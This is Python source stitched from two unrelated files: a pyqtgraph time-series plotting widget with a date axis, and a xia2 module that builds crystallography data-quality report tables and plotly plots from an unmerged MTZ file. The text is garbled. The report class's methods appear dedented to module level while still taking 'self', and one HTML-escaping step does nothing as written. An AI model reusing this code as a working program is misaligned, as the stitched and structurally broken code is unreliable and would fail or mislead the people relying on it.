        # (Removed a dead duplicate `strns = []` from the original.)
        dtu = DateUtility()
        return [dtu.todate(x) for x in values]

    def _tickStrings(self, values, scale, spacing):
        """
        Alternative (currently unused) formatter: choose time/date formats
        based on the span of the visible values and set a matching axis
        label.
        """
        if not values:
            # Guard: max()/min() below raise ValueError on an empty sequence
            return []
        strns = []
        rng = max(values) - min(values)
        # Span thresholds: a day, ~a month, ~two years (in seconds)
        if rng < 3600*24:
            string = '%H:%M:%S'
            label1 = '%b %d -'
            label2 = ' %b %d, %Y'
        elif rng >= 3600*24 and rng < 3600*24*30:
            string = '%d'
            label1 = '%b - '
            label2 = '%b, %Y'
        elif rng >= 3600*24*30 and rng < 3600*24*30*24:
            string = '%b'
            label1 = '%Y -'
            label2 = ' %Y'
        else:  # rng >= 3600*24*30*24
            string = '%Y'
            label1 = ''
            label2 = ''
        for x in values:
            try:
                strns.append(time.strftime(string, time.localtime(x)))
            except ValueError:  # Windows can't handle dates before 1970
                strns.append('')
        try:
            label = (time.strftime(label1, time.localtime(min(values))) +
                     time.strftime(label2, time.localtime(max(values))))
        except ValueError:
            label = ''
        self.setLabel(text=label)
        return strns
class Plotter(GraphicsLayoutWidget):
    """
    Time-series plot widget with a date x-axis, legend, grid, a linked
    selection region, and a crosshair that follows the mouse.
    """

    def __init__(self, parent=None):
        super(Plotter, self).__init__(parent=None, border=(100, 100, 100))
        self.setBackground((0, 0, 0))
        self.dateutil = DateUtility()
        # Bottom axis renders epoch-second tick values as date strings
        xaxis = DateAxis(orientation='bottom')
        self._plt = self.addPlot(row=0, col=0, axisItems={'bottom': xaxis})
        self._plt.addLegend()
        self._plt.setLabel("left", "Degrees Relative to Orientation")
        # Draggable region for selecting a time window
        self.region = LinearRegionItem()
        self._plt.addItem(self.region, ignoreBounds=True)
        self.region.setZValue(10)
        self._plt.sigRangeChanged.connect(self.updateRegion)
        self._plt.setAutoVisible(y=True)
        self.label = LabelItem(justify='right')
        self._plt.setLabel("bottom", "Time Shift")
        self._plt.showGrid(x=True, y=True)
        # Crosshair lines, repositioned from mouseMoved()
        self.vLine = InfiniteLine(angle=90, movable=False, pen="r")
        self.hLine = InfiniteLine(angle=0, movable=False, pen="r")
        self._plt.addItem(self.vLine, ignoreBounds=True)
        self._plt.addItem(self.hLine, ignoreBounds=True)
        self._plt.addItem(self.label)
        self.vb = self._plt.vb
        self.region.sigRegionChanged.connect(self.update)
        # Initial view: a 18000-second (5 h) window starting at "now"
        self.region.setRegion([int(self.dateutil.currentepoch()), int(self.dateutil.currentepoch()+18000)])
        self._plt.scene().sigMouseMoved.connect(self.mouseMoved)
        self._plt.setXRange(int(self.dateutil.currentepoch()), int(self.dateutil.currentepoch()+18000), padding=0)

    def updateRegion(self, window, viewRange):
        # Range-changed handler; syncing the region back to the visible
        # range is currently disabled.
        rgn = viewRange[0]
        #self.region.setRegion(rgn)

    def mouseMoved(self, evt):
        """Move the crosshair to track the mouse within the plot area."""
        #pos = evt  ## using signal proxy turns original arguments into a tuple
        if self._plt.sceneBoundingRect().contains(evt):
            mousePoint = self.vb.mapSceneToView(evt)
            index = int(mousePoint.x())
            #if index > 0 and index < len(data1):
            #    self.label.setText("<span style='font-size: 12pt'>x=%0.1f, <span style='color: red'>y1=%0.1f</span>, <span style='color: green'>y2=%0.1f</span>" % (mousePoint.x(), data1[index], data2[index]))
            self.vLine.setPos(mousePoint.x())
            self.hLine.setPos(mousePoint.y())

    def update(self):
        # Region-changed handler: keep the region on top; zoom-to-region
        # is currently disabled.
        self.region.setZValue(10)
        minX, maxX = self.region.getRegion()
        #self._plt.setXRange(minX, maxX, padding=0)

    @property
    def plotter(self):
        # The underlying PlotItem, for callers that add curves directly
        return self._plt

    def clearPlot(self):
        # TODO: not implemented
        pass
#plt = Plotter()
#xaxis = DateAxis(orientation='bottom')
#graph = plt.addPlot(row=0,col=0,axisItems={'bottom':xaxis})
#graph.setLabel("left", "Degrees Relative to Orientation")
#graph.showGrid(x=True,y=True)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import json
import os
from collections import OrderedDict
from six.moves import cStringIO as StringIO
import iotbx.phil
import xia2.Handlers.Environment
import xia2.Handlers.Files
from cctbx.array_family import flex
from mmtbx.scaling import printed_output
from xia2.Modules.Analysis import *
class xtriage_output(printed_output):
    """
    printed_output subclass that captures xtriage text per sub-header.

    Output is diverted into a StringIO buffer; on every (sub-)header the
    accumulated buffer is flushed to the original stream and replaced, so
    _sub_header_to_out ends up mapping each sub-header title to the
    buffer holding the text that followed it.
    """

    def __init__(self, out):
        super(xtriage_output, self).__init__(out)
        self.gui_output = True
        # Keep the real stream; divert writes into a snapshot buffer
        self._out_orig = self.out
        self.out = StringIO()
        self._sub_header_to_out = {}

    def show_big_header(self, text):
        # Suppress the large banner headers entirely
        pass

    def show_header(self, text):
        # Flush what we have to the real stream and start a fresh buffer
        self._out_orig.write(self.out.getvalue())
        self.out = StringIO()
        super(xtriage_output, self).show_header(text)

    def show_sub_header(self, title):
        self._out_orig.write(self.out.getvalue())
        self.out = StringIO()
        self._current_sub_header = title
        # Titles must be unique so their text can be looked up later
        assert title not in self._sub_header_to_out
        self._sub_header_to_out[title] = self.out

    def flush(self):
        # Drain the current buffer into the real stream and flush both
        self._out_orig.write(self.out.getvalue())
        self.out.flush()
        self._out_orig.flush()
class xia2_report(object):
    """
    Builds the tables and plotly plot descriptions for a xia2 HTML report
    from an unmerged CCP4 MTZ reflection file.
    """

    def __init__(self, unmerged_mtz, params, base_dir=None):
        """
        :param unmerged_mtz: path to an unmerged CCP4 MTZ file
        :param params: extracted PHIL parameters (see phil_scope)
        :param base_dir: report output directory; auto-generated if None
        """
        from iotbx.reflection_file_reader import any_reflection_file
        self.unmerged_mtz = unmerged_mtz
        self.params = params
        reader = any_reflection_file(unmerged_mtz)
        assert reader.file_type() == 'ccp4_mtz'
        arrays = reader.as_miller_arrays(merge_equivalents=False)
        self.intensities = None
        self.batches = None
        self.scales = None
        self.dose = None
        self._xanalysis = None
        # Pick out the arrays we need by their MTZ column labels
        for ma in arrays:
            if ma.info().labels == ['BATCH']:
                self.batches = ma
            elif ma.info().labels == ['DOSE']:
                self.dose = ma
            elif ma.info().labels == ['I', 'SIGI']:
                self.intensities = ma
            elif ma.info().labels == ['I(+)', 'SIGI(+)', 'I(-)', 'SIGI(-)']:
                self.intensities = ma
            elif ma.info().labels == ['SCALEUSED']:
                self.scales = ma
        assert self.intensities is not None
        assert self.batches is not None
        self.mtz_object = reader.file_content()
        # First crystal name that is not the HKL_base placeholder.
        # NOTE(review): indexing the filter() result relies on Python 2
        # semantics (filter returns a list there) — verify before porting.
        crystal_name = (filter(lambda c: c != 'HKL_base',
                               map(lambda c: c.name(), self.mtz_object.crystals()))
                        or ['DEFAULT'])[0]
        self.report_dir = base_dir or xia2.Handlers.Environment.Environment.generate_directory([crystal_name, 'report'])
        self.indices = self.mtz_object.extract_original_index_miller_indices()
        # Re-key both arrays on the original (unmapped) Miller indices
        self.intensities = self.intensities.customized_copy(
            indices=self.indices, info=self.intensities.info())
        self.batches = self.batches.customized_copy(
            indices=self.indices, info=self.batches.info())
        self._compute_merging_stats()
        if params.anomalous:
            self.intensities = self.intensities.as_anomalous_array()
            self.batches = self.batches.as_anomalous_array()
        self.intensities.setup_binner(n_bins=self.params.resolution_bins)
        self.merged_intensities = self.intensities.merge_equivalents().array()
def _compute_merging_stats(self):
    """Compute merging statistics (normal and anomalous) in resolution bins."""
    from iotbx import merging_statistics
    self.merging_stats = merging_statistics.dataset_statistics(
        self.intensities, n_bins=self.params.resolution_bins,
        cc_one_half_significance_level=self.params.cc_half_significance_level,
        eliminate_sys_absent=self.params.eliminate_sys_absent,
        use_internal_variance=self.params.use_internal_variance,
        assert_is_not_unique_set_under_symmetry=False)
    # Anomalous statistics from the ASU-mapped anomalous array
    intensities_anom = self.intensities.as_anomalous_array()
    intensities_anom = intensities_anom.map_to_asu().customized_copy(info=self.intensities.info())
    self.merging_stats_anom = merging_statistics.dataset_statistics(
        intensities_anom, n_bins=self.params.resolution_bins, anomalous=True,
        cc_one_half_significance_level=self.params.cc_half_significance_level,
        eliminate_sys_absent=self.params.eliminate_sys_absent,
        use_internal_variance=self.params.use_internal_variance,
        assert_is_not_unique_set_under_symmetry=False)
    # Bin positions in d*^2 plus matching axis tick values/labels
    self.d_star_sq_bins = [
        (1/bin_stats.d_min**2) for bin_stats in self.merging_stats.bins]
    self.d_star_sq_tickvals, self.d_star_sq_ticktext = d_star_sq_to_d_ticks(self.d_star_sq_bins, nticks=5)
def multiplicity_plots(self):
    """
    Render multiplicity slice images along h, k and l.

    Returns an OrderedDict mapping 'multiplicity_<axis>' to the plot
    image contents, base64-encoded for embedding in HTML.
    """
    from xia2.Wrappers.XIA.PlotMultiplicity import PlotMultiplicity
    mult_json_files = {}
    mult_img_files = {}
    from xia2.lib.bits import auto_logfiler
    cwd = os.getcwd()
    try:
        # The wrapper writes its output into the current directory
        os.chdir(self.report_dir)
        for axis in ('h', 'k', 'l'):
            pm = PlotMultiplicity()
            pm.set_mtz_filename(self.unmerged_mtz)
            pm.set_slice_axis(axis)
            pm.set_show_missing(True)
            auto_logfiler(pm)
            pm.run()
            mult_json_files[axis] = pm.get_json_filename()
            with open(pm.get_plot_filename(), 'rb') as fh:
                # NOTE(review): bytes.encode('base64') is Python 2 only
                mult_img_files[axis] = fh.read().encode('base64').replace('\n', '')
        return OrderedDict(('multiplicity_%s' %axis, mult_img_files[axis])
                           for axis in ('h', 'k', 'l'))
    finally:
        os.chdir(cwd)
def merging_statistics_table(self):
    """
    Build a table (header row + one row per resolution bin) of merging
    statistics; '*' marks statistically significant CC values.
    """
    headers = [u'Resolution (Å)', 'N(obs)', 'N(unique)', 'Multiplicity', 'Completeness',
               'Mean(I)', 'Mean(I/sigma)', 'Rmerge', 'Rmeas', 'Rpim', 'CC1/2']
    if not self.intensities.space_group().is_centric():
        headers.append('CCano')
    rows = []

    def safe_format(format_str, item):
        # Format item unless the statistic is missing (None)
        return format_str %item if item is not None else ''

    for bin_stats in self.merging_stats.bins:
        row = ['%.2f - %.2f' %(bin_stats.d_max, bin_stats.d_min),
               bin_stats.n_obs, bin_stats.n_uniq, '%.2f' %bin_stats.mean_redundancy,
               '%.2f' %(100*bin_stats.completeness), '%.1f' %bin_stats.i_mean,
               '%.1f' %bin_stats.i_over_sigma_mean, safe_format('%.3f', bin_stats.r_merge),
               safe_format('%.3f', bin_stats.r_meas), safe_format('%.3f', bin_stats.r_pim)]
        # CC1/2 column: sigma-tau or classical estimator per params
        if self.params.cc_half_method == 'sigma_tau':
            row.append(
                '%.3f%s' %(bin_stats.cc_one_half_sigma_tau,
                           '*' if bin_stats.cc_one_half_sigma_tau_significance else ''))
        else:
            row.append(
                '%.3f%s' %(bin_stats.cc_one_half,
                           '*' if bin_stats.cc_one_half_significance else ''))
        if not self.intensities.space_group().is_centric():
            row.append(
                '%.3f%s' %(bin_stats.cc_anom, '*' if bin_stats.cc_anom_significance else ''))
        rows.append(row)
    merging_stats_table = [headers]
    merging_stats_table.extend(rows)
    return merging_stats_table
def overall_statistics_table(self):
    """Build a table comparing overall vs lowest/highest resolution bins."""
    headers = ['', 'Overall', 'Low resolution', 'High resolution']
    stats = (self.merging_stats.overall, self.merging_stats.bins[0],
             self.merging_stats.bins[-1])
    rows = [
        [u'Resolution (Å)'] + [
            '%.2f - %.2f' %(s.d_max, s.d_min) for s in stats],
        ['Observations'] + ['%i' %s.n_obs for s in stats],
        ['Unique reflections'] + ['%i' %s.n_uniq for s in stats],
        ['Multiplicity'] + ['%.1f' %s.mean_redundancy for s in stats],
        ['Completeness'] + ['%.2f%%' %(s.completeness * 100) for s in stats],
        #['Mean intensity'] + ['%.1f' %s.i_mean for s in stats],
        ['Mean I/sigma(I)'] + ['%.1f' %s.i_over_sigma_mean for s in stats],
        ['Rmerge'] + ['%.3f' %s.r_merge for s in stats],
        ['Rmeas'] + ['%.3f' %s.r_meas for s in stats],
        ['Rpim'] + ['%.3f' %s.r_pim for s in stats],
    ]
    if self.params.cc_half_method == 'sigma_tau':
        rows.append(['CC1/2'] + ['%.3f' %s.cc_one_half_sigma_tau for s in stats])
    else:
        rows.append(['CC1/2'] + ['%.3f' %s.cc_one_half for s in stats])
    # Bold the row labels for HTML rendering
    rows = [[u'<strong>%s</strong>' %r[0]] + r[1:] for r in rows]
    overall_stats_table = [headers]
    overall_stats_table.extend(rows)
    return overall_stats_table
def symmetry_table_html(self):
    """
    Return an HTML fragment describing the input file, unit cell and
    space group.

    Bug fix: the original interpolated the space-group symbol into the
    "Unit cell" slot and the unit cell into the "Space group" slot; the
    argument order is now corrected.
    """
    symmetry_table_html = """
<p>
<b>Filename:</b> %s
<br>
<b>Unit cell:</b> %s
<br>
<b>Space group:</b> %s
</p>
""" %(os.path.abspath(self.unmerged_mtz),
      str(self.intensities.unit_cell()),
      self.intensities.space_group_info().symbol_and_number())
    return symmetry_table_html
def xtriage_report(self):
    """
    Run xtriage on the merged/unmerged intensities, log its output, and
    bucket its issues into (success, warnings, danger) lists of dicts
    with keys 'level', 'text', 'summary', 'header'.
    """
    xtriage_success = []
    xtriage_warnings = []
    xtriage_danger = []
    s = StringIO()
    pout = printed_output(out=s)
    from mmtbx.scaling.xtriage import xtriage_analyses
    from mmtbx.scaling.xtriage import master_params as xtriage_master_params
    xtriage_params = xtriage_master_params.fetch(sources=[]).extract()
    xtriage_params.scaling.input.xray_data.skip_sanity_checks = True
    xanalysis = xtriage_analyses(
        miller_obs=self.merged_intensities,
        unmerged_obs=self.intensities, text_out=pout,
        params=xtriage_params,
    )
    # Persist the full xtriage log and register it with the file handler
    with open(os.path.join(self.report_dir, 'xtriage.log'), 'wb') as f:
        f.write(s.getvalue())
    xia2.Handlers.Files.FileHandler.record_log_file('Xtriage',
                                                    os.path.join(self.report_dir, 'xtriage.log'))
    # Re-run the display through the capturing output class so each
    # issue below can be paired with the text under its sub-header
    xs = StringIO()
    xout = xtriage_output(xs)
    xanalysis.show(out=xout)
    xout.flush()
    sub_header_to_out = xout._sub_header_to_out
    issues = xanalysis.summarize_issues()
    #issues.show()
    for level, text, sub_header in issues._issues:
        summary = sub_header_to_out.get(sub_header, StringIO()).getvalue()
        # NOTE(review): these replace() calls are no-ops as written;
        # presumably they were meant to HTML-escape '<'/'>' — verify
        summary = summary.replace('<', '<').replace('>', '>')
        d = {
            'level': level,
            'text': text,
            'summary': summary,
            'header': sub_header,
        }
        # Issue levels: 0 = OK, 1 = warning, 2 = severe
        if level == 0: xtriage_success.append(d)
        elif level == 1: xtriage_warnings.append(d)
        elif level == 2: xtriage_danger.append(d)
    self._xanalysis = xanalysis
    return xtriage_success, xtriage_warnings, xtriage_danger
def i_over_sig_i_plot(self):
    """Plotly description of mean I/sig(I) per resolution bin."""
    signal_to_noise = [b.i_over_sigma_mean for b in self.merging_stats.bins]
    trace = {
        'x': self.d_star_sq_bins,  # d_star_sq
        'y': signal_to_noise,
        'type': 'scatter',
        'name': 'I/sigI vs resolution',
    }
    layout = {
        'title': '<I/sig(I)> vs resolution',
        'xaxis': {
            'title': u'Resolution (Å)',
            'tickvals': self.d_star_sq_tickvals,
            'ticktext': self.d_star_sq_ticktext,
        },
        'yaxis': {
            'title': '<I/sig(I)>',
            'rangemode': 'tozero'
        },
    }
    return {'i_over_sig_i': {'data': [trace], 'layout': layout}}
def i_over_sig_i_vs_batch_plot(self):
    """Plotly description of mean I/sig(I) per (gap-free) batch number."""
    from xia2.Modules.PyChef2.PyChef import remove_batch_gaps
    # Renumber batches so separate runs are contiguous on the x axis
    new_batch_data = remove_batch_gaps(self.batches.data())
    new_batches = self.batches.customized_copy(data=new_batch_data)
    result = i_sig_i_vs_batch(self.intensities, new_batches)
    return {
        'i_over_sig_i_vs_batch': {
            'data': [
                {
                    'x': result.batches,
                    'y': result.data,
                    'type': 'scatter',
                    'name': 'I/sigI vs batch',
                    'opacity': 0.75,
                },
            ],
            'layout': {
                'title': '<I/sig(I)> vs batch',
                'xaxis': {'title': 'N'},
                'yaxis': {
                    'title': '<I/sig(I)>',
                    'rangemode': 'tozero'
                },
            },
        }
    }
def cc_one_half_plot(self):
    """
    Plotly description of CC1/2 (and CCanom for non-centric groups) vs
    resolution, with their p=0.01 critical-value curves.
    """
    # Select the CC1/2 estimator requested in the parameters
    if self.params.cc_half_method == 'sigma_tau':
        cc_one_half_bins = [
            bin_stats.cc_one_half_sigma_tau for bin_stats in self.merging_stats.bins]
        cc_one_half_critical_value_bins = [
            bin_stats.cc_one_half_sigma_tau_critical_value for bin_stats in self.merging_stats.bins]
    else:
        cc_one_half_bins = [
            bin_stats.cc_one_half for bin_stats in self.merging_stats.bins]
        cc_one_half_critical_value_bins = [
            bin_stats.cc_one_half_critical_value for bin_stats in self.merging_stats.bins]
    cc_anom_bins = [
        bin_stats.cc_anom for bin_stats in self.merging_stats.bins]
    cc_anom_critical_value_bins = [
        bin_stats.cc_anom_critical_value for bin_stats in self.merging_stats.bins]
    return {
        'cc_one_half': {
            'data': [
                {
                    'x': self.d_star_sq_bins, # d_star_sq
                    'y': cc_one_half_bins,
                    'type': 'scatter',
                    'name': 'CC-half',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                    },
                },
                {
                    'x': self.d_star_sq_bins, # d_star_sq
                    'y': cc_one_half_critical_value_bins,
                    'type': 'scatter',
                    'name': 'CC-half critical value (p=0.01)',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                        'dash': 'dot',
                    },
                },
                # CCanom traces collapse to empty dicts for centric groups
                ({
                    'x': self.d_star_sq_bins, # d_star_sq
                    'y': cc_anom_bins,
                    'type': 'scatter',
                    'name': 'CC-anom',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(255, 127, 14)',
                    },
                } if not self.intensities.space_group().is_centric() else {}),
                ({
                    'x': self.d_star_sq_bins, # d_star_sq
                    'y': cc_anom_critical_value_bins,
                    'type': 'scatter',
                    'name': 'CC-anom critical value (p=0.01)',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(255, 127, 14)',
                        'dash': 'dot',
                    },
                } if not self.intensities.space_group().is_centric() else {}),
            ],
            'layout':{
                'title': 'CC-half vs resolution',
                'xaxis': {
                    'title': u'Resolution (Å)',
                    'tickvals': self.d_star_sq_tickvals,
                    'ticktext': self.d_star_sq_ticktext,
                },
                'yaxis': {
                    'title': 'CC-half',
                    'range': [min(cc_one_half_bins + cc_anom_bins + [0]), 1]
                },
            },
            'help': '''\
The correlation coefficients, CC1/2, between random half-datasets. A correlation
coefficient of +1 indicates good correlation, and 0 indicates no correlation.
CC1/2 is typically close to 1 at low resolution, falling off to close to zero at
higher resolution. A typical resolution cutoff based on CC1/2 is around 0.3-0.5.
[1] Karplus, P. A., & Diederichs, K. (2012). Science, 336(6084), 1030-1033.
https://doi.org/10.1126/science.1218231
[2] Diederichs, K., & Karplus, P. A. (2013). Acta Cryst D, 69(7), 1215-1222.
https://doi.org/10.1107/S0907444913001121
[3] Evans, P. R., & Murshudov, G. N. (2013). Acta Cryst D, 69(7), 1204-1214.
https://doi.org/10.1107/S0907444913000061
'''
        }
    }
def scale_rmerge_vs_batch_plot(self):
    """Plotly description of scale factor (if present) and Rmerge per batch."""
    from xia2.Modules.PyChef2.PyChef import remove_batch_gaps
    # Renumber batches so separate runs are contiguous on the x axis
    new_batch_data = remove_batch_gaps(self.batches.data())
    new_batches = self.batches.customized_copy(data=new_batch_data)
    if self.scales is not None:
        sc_vs_b = scales_vs_batch(self.scales, new_batches)
    rmerge_vs_b = rmerge_vs_batch(self.intensities, new_batches)
    return {
        'scale_rmerge_vs_batch': {
            'data': [
                # Empty placeholder when no SCALEUSED column was present
                # (sc_vs_b is only defined in that same case)
                ({
                    'x': sc_vs_b.batches,
                    'y': sc_vs_b.data,
                    'type': 'scatter',
                    'name': 'Scale',
                    'opacity': 0.75,
                } if self.scales is not None else {}),
                {
                    'x': rmerge_vs_b.batches,
                    'y': rmerge_vs_b.data,
                    'yaxis': 'y2',
                    'type': 'scatter',
                    'name': 'Rmerge',
                    'opacity': 0.75,
                },
            ],
            'layout': {
                'title': 'Scale and Rmerge vs batch',
                'xaxis': {'title': 'N'},
                'yaxis': {
                    'title': 'Scale',
                    'rangemode': 'tozero'
                },
                'yaxis2': {
                    'title': 'Rmerge',
                    'overlaying': 'y',
                    'side': 'right',
                    'rangemode': 'tozero'
                }
            },
        }
    }
def completeness_plot(self):
    """Plotly description of (anomalous) completeness per resolution bin."""
    completeness_bins = [
        bin_stats.completeness for bin_stats in self.merging_stats.bins]
    anom_completeness_bins = [
        bin_stats.anom_completeness for bin_stats in self.merging_stats_anom.bins]
    return {
        'completeness': {
            'data': [
                {
                    'x': self.d_star_sq_bins,
                    'y': completeness_bins,
                    'type': 'scatter',
                    'name': 'Completeness',
                },
                # Empty placeholder trace for centric space groups
                ({
                    'x': self.d_star_sq_bins,
                    'y': anom_completeness_bins,
                    'type': 'scatter',
                    'name': 'Anomalous completeness',
                } if not self.intensities.space_group().is_centric() else {}),
            ],
            'layout':{
                'title': 'Completeness vs resolution',
                'xaxis': {
                    'title': u'Resolution (Å)',
                    'tickvals': self.d_star_sq_tickvals,
                    'ticktext': self.d_star_sq_ticktext,
                },
                'yaxis': {
                    'title': 'Completeness',
                    'range': (0, 1),
                },
            },
        }
    }
def multiplicity_histogram(self):
    """Histogram of observation multiplicity, split acentric/centric."""
    merging = self.intensities.merge_equivalents()
    # Include unobserved reflections with multiplicity 0
    multiplicities = merging.redundancies().complete_array(new_data_value=0)
    mult_acentric = multiplicities.select_acentric().data()
    mult_centric = multiplicities.select_centric().data()
    multiplicities_acentric = {}
    multiplicities_centric = {}
    # Count how many reflections have each multiplicity value
    for x in sorted(set(mult_acentric)):
        multiplicities_acentric[x] = mult_acentric.count(x)
    for x in sorted(set(mult_centric)):
        multiplicities_centric[x] = mult_centric.count(x)
    return {
        'multiplicities': {
            'data': [
                {
                    # NOTE(review): .keys()/.values() are lists on Python 2
                    # but views on Python 3 — verify before porting
                    'x': multiplicities_acentric.keys(),
                    'y': multiplicities_acentric.values(),
                    'type': 'bar',
                    'name': 'Acentric',
                    'opacity': 0.75,
                },
                {
                    'x': multiplicities_centric.keys(),
                    'y': multiplicities_centric.values(),
                    'type': 'bar',
                    'name': 'Centric',
                    'opacity': 0.75,
                },
            ],
            'layout': {
                'title': 'Distribution of multiplicities',
                'xaxis': {'title': 'Multiplicity'},
                'yaxis': {
                    'title': 'Frequency',
                    #'rangemode': 'tozero'
                },
                'bargap': 0,
                'barmode': 'overlay',
            },
        }
    }
def multiplicity_vs_resolution_plot(self):
    """Plotly description of mean multiplicity per resolution bin."""
    ordinary = [b.mean_redundancy for b in self.merging_stats.bins]
    anomalous = [b.mean_redundancy for b in self.merging_stats_anom.bins]
    traces = [{
        'x': self.d_star_sq_bins,
        'y': ordinary,
        'type': 'scatter',
        'name': 'Multiplicity',
    }]
    # The anomalous trace is an empty placeholder for centric groups
    if not self.intensities.space_group().is_centric():
        traces.append({
            'x': self.d_star_sq_bins,
            'y': anomalous,
            'type': 'scatter',
            'name': 'Anomalous multiplicity',
        })
    else:
        traces.append({})
    layout = {
        'title': 'Multiplicity vs resolution',
        'xaxis': {
            'title': u'Resolution (Å)',
            'tickvals': self.d_star_sq_tickvals,
            'ticktext': self.d_star_sq_ticktext,
        },
        'yaxis': {
            'title': 'Multiplicity',
        },
    }
    return {
        'multiplicity_vs_resolution': {'data': traces, 'layout': layout},
    }
def second_moments_plot(self):
    """
    Plotly description of the second moment of I vs resolution for
    acentric and centric reflections.
    """
    acentric = self.merged_intensities.select_acentric()
    centric = self.merged_intensities.select_centric()
    if acentric.size():
        acentric.setup_binner(n_bins=self.params.resolution_bins)
        second_moments_acentric = acentric.second_moment_of_intensities(use_binning=True)
    else:
        second_moments_acentric = None
    if centric.size():
        centric.setup_binner(n_bins=self.params.resolution_bins)
        second_moments_centric = centric.second_moment_of_intensities(use_binning=True)
    else:
        second_moments_centric = None
    # Collect bin centres from whichever subsets exist to derive ticks
    second_moment_d_star_sq = []
    if acentric.size():
        second_moment_d_star_sq.extend(second_moments_acentric.binner.bin_centers(2))
    if centric.size():
        second_moment_d_star_sq.extend(second_moments_centric.binner.bin_centers(2))
    tickvals_2nd_moment, ticktext_2nd_moment = d_star_sq_to_d_ticks(
        second_moment_d_star_sq, nticks=5)
    return {
        'second_moments': {
            'data': [
                ({
                    'x': list(second_moments_acentric.binner.bin_centers(2)), # d_star_sq
                    # [1:-1] presumably drops under/overflow bins — verify
                    'y': second_moments_acentric.data[1:-1],
                    'type': 'scatter',
                    'name': '<I^2> acentric',
                } if acentric.size() else {}),
                ({
                    'x': list(second_moments_centric.binner.bin_centers(2)), # d_star_sq
                    'y': second_moments_centric.data[1:-1],
                    'type': 'scatter',
                    'name': '<I^2> centric',
                } if centric.size() else {})
            ],
            'layout': {
                'title': 'Second moment of I',
                'xaxis': {
                    'title': u'Resolution (Å)',
                    'tickvals': tickvals_2nd_moment,
                    'ticktext': ticktext_2nd_moment,
                },
                'yaxis': {
                    'title': '<I^2>',
                    'rangemode': 'tozero'
                },
            }
        }
    }
def cumulative_intensity_distribution_plot(self):
    """
    Plotly N(z) test: observed vs theoretical cumulative intensity
    distributions. Requires xtriage_report() to have run first (it sets
    self._xanalysis); returns {} otherwise.
    """
    if not self._xanalysis or not self._xanalysis.twin_results:
        return {}
    nz_test = self._xanalysis.twin_results.nz_test
    return {
        'cumulative_intensity_distribution': {
            'data': [
                {
                    'x': list(nz_test.z),
                    'y': list(nz_test.ac_obs),
                    'type': 'scatter',
                    'name': 'Acentric observed',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                    },
                },
                {
                    'x': list(nz_test.z),
                    'y': list(nz_test.c_obs),
                    'type': 'scatter',
                    'name': 'Centric observed',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(255, 127, 14)',
                    },
                },
                {
                    'x': list(nz_test.z),
                    'y': list(nz_test.ac_untwinned),
                    'type': 'scatter',
                    'name': 'Acentric theory',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                        'dash': 'dot',
                    },
                    'opacity': 0.8,
                },
                {
                    'x': list(nz_test.z),
                    'y': list(nz_test.c_untwinned),
                    'type': 'scatter',
                    'name': 'Centric theory',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(255, 127, 14)',
                        'dash': 'dot',
                    },
                    'opacity': 0.8,
                },
            ],
            'layout': {
                'title': 'Cumulative intensity distribution',
                'xaxis': {
                    'title': 'z',
                    'range': (0, 1),
                },
                'yaxis': {
                    'title': 'P(Z <= Z)',
                    'range': (0, 1),
                },
            }
        }
    }
def l_test_plot(self):
    """
    Plotly L test (Padilla and Yeates) twinning plot. Requires
    xtriage_report() to have run first; returns {} otherwise.
    """
    if not self._xanalysis or not self._xanalysis.twin_results:
        return {}
    l_test = self._xanalysis.twin_results.l_test
    return {
        'l_test': {
            'data': [
                {
                    'x': list(l_test.l_values),
                    'y': list(l_test.l_cumul_untwinned),
                    'type': 'scatter',
                    'name': 'Untwinned',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                        'dash': 'dashdot',
                    },
                },
                {
                    'x': list(l_test.l_values),
                    'y': list(l_test.l_cumul_perfect_twin),
                    'type': 'scatter',
                    'name': 'Perfect twin',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(31, 119, 180)',
                        'dash': 'dot',
                    },
                    'opacity': 0.8,
                },
                {
                    'x': list(l_test.l_values),
                    'y': list(l_test.l_cumul),
                    'type': 'scatter',
                    'name': 'Observed',
                    'mode': 'lines',
                    'line': {
                        'color': 'rgb(255, 127, 14)',
                    },
                },
            ],
            'layout': {
                'title': 'L test (Padilla and Yeates)',
                'xaxis': {
                    'title': '|l|',
                    'range': (0, 1),
                },
                'yaxis': {
                    'title': 'P(L >= l)',
                    'range': (0, 1),
                },
            }
        }
    }
def wilson_plot(self):
    """
    Plotly Wilson intensity plot (observed / expected / smoothed mean I).
    Requires xtriage_report() to have run first; returns {} otherwise.
    """
    if not self._xanalysis or not self._xanalysis.wilson_scaling:
        return {}
    wilson_scaling = self._xanalysis.wilson_scaling
    tickvals_wilson, ticktext_wilson = d_star_sq_to_d_ticks(
        wilson_scaling.d_star_sq, nticks=5)
    return {
        'wilson_intensity_plot': {
            'data': ([
                {
                    'x': list(wilson_scaling.d_star_sq),
                    'y': list(wilson_scaling.mean_I_obs_data),
                    'type': 'scatter',
                    'name': 'Observed',
                },
                {
                    'x': list(wilson_scaling.d_star_sq),
                    'y': list(wilson_scaling.mean_I_obs_theory),
                    'type': 'scatter',
                    'name': 'Expected',
                },
                {
                    'x': list(wilson_scaling.d_star_sq),
                    'y': list(wilson_scaling.mean_I_normalisation),
                    'type': 'scatter',
                    'name': 'Smoothed',
                }]),
            'layout': {
                'title': 'Wilson intensity plot',
                'xaxis': {
                    'title': u'Resolution (Å)',
                    'tickvals': tickvals_wilson,
                    'ticktext': ticktext_wilson,
                },
                'yaxis': {
                    'type': 'log',
                    'title': 'Mean(I)',
                    'rangemode': 'tozero',
                },
            },
        }
    }
def pychef_plots(self, n_bins=8):
    """
    Radiation-damage (CHEF) statistics plots as a dict, computed from
    the DOSE column if present, otherwise from batch numbers.
    """
    from xia2.Modules.PyChef2 import PyChef
    intensities = self.intensities
    batches = self.batches
    dose = self.dose
    if self.params.chef_min_completeness:
        # Restrict the analysis to the resolution at which the data are
        # at least this complete
        d_min = PyChef.resolution_limit(
            mtz_file=self.unmerged_mtz, min_completeness=self.params.chef_min_completeness, n_bins=n_bins)
